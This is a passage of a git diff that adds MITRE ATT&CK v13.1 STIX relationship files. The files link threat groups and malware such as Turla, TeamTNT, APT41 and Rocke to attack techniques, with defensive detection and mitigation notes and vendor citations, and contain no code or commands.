"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-01-24T19:36:42.015Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json new file mode 100644 index 0000000000000000000000000000000000000000..aec69b8807de4bddbb9f61c04c32b05d8104012b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--fdfa8ab7-2dad-41f1-95f9-0f33c15fbf14", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + } + ], + "modified": "2019-07-14T21:04:44.978Z", + "description": "Based on comparison of [Gazer](https://attack.mitre.org/software/S0168) versions, [Turla](https://attack.mitre.org/groups/G0010) made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.(Citation: ESET Gazer Aug 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json new file mode 100644 index 0000000000000000000000000000000000000000..96d53dbbfb5c30c1be2b1d07969e5c8bf5fbac37 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d5ac8164-7bb7-40e8-93da-ac7ba1a581fa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a", + "type": "relationship", + "created": "2022-03-30T14:26:51.869Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.869Z", + "description": "Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json new file mode 100644 index 0000000000000000000000000000000000000000..258037cc7cb92c55d6c8ea228c77b01dcdda29fc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c8584602-71c2-456e-8480-0afe3f450487", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fee6aca0-dcb7-43b4-a253-66913620631a", + "type": "relationship", + "created": "2020-05-29T19:02:06.766Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Trend Micro TA505 June 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/", + "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020." + } + ], + "modified": "2020-06-15T22:05:43.295Z", + "description": "[TA505](https://attack.mitre.org/groups/G0092) has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json new file mode 100644 index 0000000000000000000000000000000000000000..89c251b869e18d391add194306734cbd963d2d3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--1fa82c97-ca3d-4ad4-89c4-1bbdab866f3e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", + "type": "relationship", + "created": "2019-12-19T19:43:34.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-12-19T19:43:34.933Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json new file mode 100644 index 0000000000000000000000000000000000000000..a656aa3eb30a812118a2014bf74af76d9992e351 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c47e7a32-f4ea-46b5-95bd-76a0ca4649a5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f", + "type": "relationship", + "created": "2021-05-26T15:05:36.548Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry CostaRicto November 2020", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021." + } + ], + "modified": "2021-05-26T15:39:51.029Z", + "description": "[SombRAT](https://attack.mitre.org/software/S0615) can execute getinfo to enumerate the computer name and OS version of a compromised system.(Citation: BlackBerry CostaRicto November 2020)", + "relationship_type": "uses", + "source_ref": "malware--425771c5-48b4-4ecd-9f95-74ed3fc9da59", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json new file mode 100644 index 0000000000000000000000000000000000000000..846bc4b885232e73aa5a7fc1a6244b04be88ead7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--dbbdbbf8-1037-4e06-b201-677a2b70d3c7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff500c79-fa27-4fe3-a3c2-8c5d20031824", + "created": "2021-10-01T01:57:31.607Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cisco Talos Intelligence Group", + "description": "Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.", + "url": "https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/" + }, + { + "source_name": "Aqua TeamTNT August 2020", + "description": "Kol, Roi. Morag, A. (2020, August 25). Deep Analysis of TeamTNT Techniques Using Container Images to Attack. Retrieved September 22, 2021.", + "url": "https://blog.aquasec.com/container-security-tnt-container-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-12-01T17:31:07.718Z", + "description": "[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged iplogger.org to send collected data back to C2.(Citation: Aqua TeamTNT August 2020)(Citation: Cisco Talos Intelligence Group)", + "relationship_type": "uses", + "source_ref": "intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json new file mode 100644 index 0000000000000000000000000000000000000000..58660d1860ed794def476c9fbc72bb163c75d55e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--27bc214d-3784-47e2-aed0-6d053882ced1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55", + "type": "relationship", + "created": "2022-03-30T14:26:51.839Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.839Z", + "description": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe. Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + } + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json new file mode 100644 index 0000000000000000000000000000000000000000..eb17a31d938310736851561b8badd87b85049799 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e0633-9618-4616-a303-f9bb059f6289.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--16ee55c3-cdd4-4d32-8f60-ea2a9e6e58a7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff9e0633-9618-4616-a303-f9bb059f6289", + "type": "relationship", + "created": "2019-09-18T18:09:59.911Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", + "description": "Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy\u2019s Linux Backdoor. Retrieved September 10, 2017.", + "source_name": "Fysbis Palo Alto Analysis" + } + ], + "modified": "2020-03-20T17:22:43.567Z", + "description": "[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)", + "relationship_type": "uses", + "source_ref": "malware--50d6688b-0985-4f3d-8cbe-0c796b30703b", + "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json new file mode 100644 index 0000000000000000000000000000000000000000..8d28f0b9d91c7dc33ccb87f2c1109a847fba2afe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e4602cc7-0c3a-476f-ba07-0e8c11d31d2f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ff9e8d81-dc74-4494-a4aa-54f8039f9ad7", + "created": "2022-02-02T21:30:09.805Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BiZone Lizar May 2021", + "url": "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker\u2019s toolkit. Retrieved February 2, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Lizar](https://attack.mitre.org/software/S0681) has encrypted data before sending it to the server.(Citation: BiZone Lizar May 2021)", + "modified": "2022-04-05T17:31:10.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f74a5069-015d-4404-83ad-5ca01056c0dc", + "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json new file mode 100644 index 0000000000000000000000000000000000000000..48e3659b64654a86db24ab251e402057a02dd9b1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--57aed8ad-3ac4-40ce-b6ba-fb93a7585ae1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d", + "created": "2022-09-29T19:05:32.702Z", + "revoked": false, + "external_references": [ + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T19:05:32.702Z", + "description": "During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)", + "relationship_type": "uses", + "source_ref": "campaign--78068e68-4124-4243-b6f4-76e4e5be8a06", + "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json new file mode 100644 index 0000000000000000000000000000000000000000..37970edeff87c692de16805a7b94c1b3db8125cc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9fd2d7aa-dc9d-4524-aaf6-d264f6b7c566", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f", + "type": "relationship", + "created": "2022-03-30T14:26:51.876Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.876Z", + "description": "Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json new file mode 100644 index 0000000000000000000000000000000000000000..068eb01a1372a5b0d17d68a023902b4f5e4ea272 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9c3b4cca-b926-440d-a24d-3d5927123efd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20", + "created": "2019-06-25T12:15:00.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft AMSI June 2015", + "description": "Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.", + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/?source=mmpc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:12.796Z", + "description": "Anti-virus can be used to automatically detect and quarantine suspicious files. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. (Citation: Microsoft AMSI June 2015)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json new file mode 100644 index 0000000000000000000000000000000000000000..49e3f338c67daf4b8bb63d3b8c975b955f694424 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--7fd08905-c274-4be5-be7e-80e9ff9b3ce8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffac75cc-91ec-4ecc-827c-a7090b8951c5", + "type": "relationship", + "created": "2022-03-30T14:26:51.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.870Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json new file mode 100644 index 0000000000000000000000000000000000000000..3e1c118d09e89f1dd2f5b4ad4053f609b1660de4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ee7013c7-4a63-4ac0-b991-b45039945599", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffacfdd1-702e-4bb9-b60c-8e5c4cdf2a06", + "type": "relationship", + "created": "2020-12-22T17:48:21.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020." + } + ], + "modified": "2021-04-12T02:29:14.480Z", + "description": "[APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "target_ref": "attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json new file mode 100644 index 0000000000000000000000000000000000000000..c5e875a7e24f6e4c282f914c61e8eb1f87dd00bf --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--8dd483b1-a7d2-4df9-819c-dd8078ade369", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffb03265-d9d6-4dc7-ba8e-71498be4e131", + "type": "relationship", + "created": "2020-05-26T16:17:59.670Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos Rocke August 2018", + "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html", + "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020." + }, + { + "source_name": "Unit 42 Rocke January 2019", + "url": "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/", + "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020." + } + ], + "modified": "2020-05-26T16:17:59.670Z", + "description": "[Rocke](https://attack.mitre.org/groups/G0106) used scripts which detected and uninstalled antivirus software.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json new file mode 100644 index 0000000000000000000000000000000000000000..9ee138867a949df6642b4cf45fcd947c90bb4875 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f5c28b7f-a17d-4f30-84ee-d16ea4fcac8a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffbaf980-7288-4bfd-9887-6b4a103f178c", + "type": "relationship", + "created": "2022-03-30T14:26:51.850Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.850Z", + "description": "Monitor executed commands and arguments that may execute their own malicious payloads by hijacking the way operating systems run programs.", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 